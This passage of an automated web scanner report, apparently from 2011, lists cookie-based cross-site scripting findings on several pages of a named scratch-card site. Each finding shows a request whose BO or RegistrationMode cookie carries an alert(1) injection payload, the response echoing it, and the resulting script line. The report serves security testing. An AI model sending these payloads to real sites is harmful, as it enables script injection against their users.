            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMce8fc"-alert(1)-"38f2ab8268e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede9a"-alert(1)-"527fff7e23e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMede9a"-alert(1)-"527fff7e23e; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: BO=FMede9a"-alert(1)-"527fff7e23e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMede9a"-alert(1)-"527fff7e23e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9953"-alert(1)-"b55f2d4f8e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa9953"-alert(1)-"b55f2d4f8e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f142"-alert(1)-"53426c7c4b6 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4f142"-alert(1)-"53426c7c4b6; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: BO=FM4f142"-alert(1)-"53426c7c4b6; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4f142"-alert(1)-"53426c7c4b6";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51939"-alert(1)-"91ead81e5ee was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM51939"-alert(1)-"91ead81e5ee";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1ace"-alert(1)-"2c707f54abb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMa1ace"-alert(1)-"2c707f54abb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: BO=FMa1ace"-alert(1)-"2c707f54abb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa1ace"-alert(1)-"2c707f54abb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84ee"-alert(1)-"d1b4367f894 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc84ee"-alert(1)-"d1b4367f894";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3ae"-alert(1)-"71c4f817bc was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM2f3ae"-alert(1)-"71c4f817bc; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FM2f3ae"-alert(1)-"71c4f817bc; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2f3ae"-alert(1)-"71c4f817bc";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b33"-alert(1)-"217dc5d8aff was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34424


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb7b33"-alert(1)-"217dc5d8aff";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebe8"-alert(1)-"bda4796c29a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4ebe8"-alert(1)-"bda4796c29a; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: BO=FM4ebe8"-alert(1)-"bda4796c29a; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835


